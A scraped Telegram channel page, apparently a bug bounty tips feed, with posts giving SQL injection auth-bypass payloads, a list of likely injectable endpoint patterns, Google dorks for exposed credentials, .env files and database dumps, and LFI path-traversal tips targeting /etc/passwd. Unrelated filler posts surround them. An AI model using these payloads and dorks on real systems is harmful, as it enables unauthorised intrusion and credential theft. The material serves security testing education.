fa
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

رفتن به کانال در Telegram
7 429
مشترکین
+424 ساعت
+207 روز
+16430 روز
آرشیو پست ها
Now SQL Injection - another Bypass Auth Payloads " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or 1=1-- or true-- " or true-- ' or true-- ")or true-- ') or true-- ' or 'x'='x ) or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x credit: @mamunwhh http://GitBook_s.t.me

these sqli endpoint are most likely vulnerable: .php: 1. index.php?category=<SQLi payload> 2. product.php?id=<SQLi payload> 3. news.php?article_id=<SQLi payload> 4. user.php?username=<SQLi payload> 5. login.php?username=<SQLi payload>&password=<SQLi payload> 6. search.php?q=<SQLi payload> 7. blog.php?post_id=<SQLi payload> 8. forum.php?thread_id=<SQLi payload> 9. profile.php?user_id=<SQLi payload> 10. admin.php?username=<SQLi payload>&password=<SQLi payload> .asp: 1. default.asp?catid=<SQLi payload> 2. product.asp?id=<SQLi payload> 3. news.asp?newsid=<SQLi payload> 4. login.asp?username=<SQLi payload>&password=<SQLi payload> 5. search.asp?q=<SQLi payload> 6. blog.asp?postid=<SQLi payload> 7. forum.asp?threadid=<SQLi payload> 8. profile.asp?userid=<SQLi payload> 9. admin.asp?username=<SQLi payload>&password=<SQLi payload> 10. register.asp?username=<SQLi payload>&password=<SQLi payload> .aspx: 1. default.aspx?catid=<SQLi payload> 2. product.aspx?id=<SQLi payload> 3. news.aspx?newsid=<SQLi payload> 4. login.aspx?username=<SQLi payload>&password=<SQLi payload> 5. search.aspx?q=<SQLi payload> 6. blog.aspx?postid=<SQLi payload> 7. forum.aspx?threadid=<SQLi payload> 8. profile.aspx?userid=<SQLi payload> 9. admin.aspx?username=<SQLi payload>&password=<SQLi payload> 10. register.aspx?username=<SQLi payload>&password=<SQLi payload> .cfm: 1. index.cfm?catid=<SQLi payload> 2. product.cfm?id=<SQLi payload> 3. news.cfm?newsid=<SQLi payload> 4. login.cfm?username=<SQLi payload>&password=<SQLi payload> 5. search.cfm?q=<SQLi payload> 6. blog.cfm?postid=<SQLi payload> 7. forum.cfm?threadid=<SQLi payload> 8. profile.cfm?userid=<SQLi payload> 9. admin.cfm?username=<SQLi payload>&password=<SQLi payload> 10. register.cfm?username=<SQLi payload>&password=<SQLi payload> .jsp: 1. index.jsp?catid=<SQLi payload> 2. product.jsp?id=<SQLi payload> 3. news.jsp?newsid=<SQLi payload> 4. login.jsp?username=<SQLi payload>&password=<SQLi payload> 5. search.jsp?q=<SQLi payload> 6. blog.jsp?postid=<SQLi payload> 7. forum.jsp?threadid=<SQLi payload> 8. profile.jsp?userid=<SQLi payload> 9. admin.jsp?username=<SQLi payload>&password=<SQLi payload> 10. register.jsp?username=<SQLi payload>&password=<SQLi payload>

If you are having trouble reading medium writeups, you can use the two sites below and read without restriction. 1. Readmedium.com 2. Freedium.cfd

Pentester Guide A Comprehensive Resource for Pentesters: Tools, Methodologies, Scripts, Certifications, Learning Resources, L
Pentester Guide
A Comprehensive Resource for Pentesters: Tools, Methodologies, Scripts, Certifications, Learning Resources, Labs, Career Opportunities, Entertainment, and Freelancing Tips.
Link: https://github.com/ZishanAdThandar/pentest/tree/main/notes

Useful Google Dorks that bug bounty hunters can leverage to find sensitive information: 👇🏻 1. Discovering Exposed Files:    - intitle:"index of" "site:target.com"    - filetype:log inurl:log site:target.com    - filetype:sql inurl:sql site:target.com    - filetype:env inurl:.env site:target.com 2. Finding Sensitive Directories:    - inurl:/phpinfo.php site:target.com    - inurl:/admin site:target.com    - inurl:/backup site:target.com    - inurl:wp- site:target.com 3. Exposed Configuration Files:    - filetype:config inurl:config site:target.com    - filetype:ini inurl:wp-config.php site:target.com    - filetype:json inurl:credentials site:target.com 4. Discovering Usernames and Passwords:    - intext:"password" filetype:log site:target.com    - intext:"username" filetype:log site:target.com    - filetype:sql "password" site:target.com 5. Finding Database Files:    - filetype:sql inurl:db site:target.com    - filetype:sql inurl:dump site:target.com    - filetype:bak inurl:db site:target.com 6. Exposed Git Repositories:    - inurl:".git" site:target.com    - inurl:"/.git/config" site:target.com    - intitle:"index of" ".git" site:target.com 7. Finding Publicly Exposed Emails:    - intext:"email" site:target.com    - inurl:"contact" intext:"@target.com" -www.target.com    - filetype:xls inurl:"email" site:target.com 8. Discovering Vulnerable Web Servers:    - intitle:"Apache2 Ubuntu Default Page: It works" site:target.com    - intitle:"Index of /" "Apache Server" site:target.com    - intitle:"Welcome to nginx" site:target.com 9. Finding API Keys:    - filetype:env "DB_PASSWORD" site:target.com    - intext:"api_key" filetype:env site:target.com    - intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com 10. Exposed Backup Files:     - filetype:bak inurl:backup site:target.com     - filetype:bak inurl:backup site:target.com     - filetype:zip inurl:backup site:target.com     - filetype:tgz inurl:backup site:target.com

کسی آموزش ویولن داره بگه؟

140 view and 3 buy For now

avatar
Unlock fortelegram star2

ygffgf

Wordlist for subdomain brute

Wordlist for Directory fuzzing

+1
Wordlist for Directory fuzzing

https://t.me/RahaRM_Official a personal channel covering topics like security, web development, programming and more

🔍 LFI Hunting Tips from Real Finds: 1️⃣ GET path injection: Try ///../../../../etc/passwd. Fuzz w/ Burp! 2️⃣ POST LFIs: Test
🔍 LFI Hunting Tips from Real Finds: 1️⃣ GET path injection: Try ///../../../../etc/passwd. Fuzz w/ Burp! 2️⃣ POST LFIs: Test endpoints like /router.jsp?../etc/passwd. 3️⃣ Hidden params: Brute-force w/ ParamSpider or check JS files. 💡 Bypass filters w/ %2e%2f or %00

photo content

List of past and future infosec related events. Source: https://github.com/xsa/infosec-events

Bug Bounty - GitBook - آمار و تحلیل کانال تلگرام @gitbook_s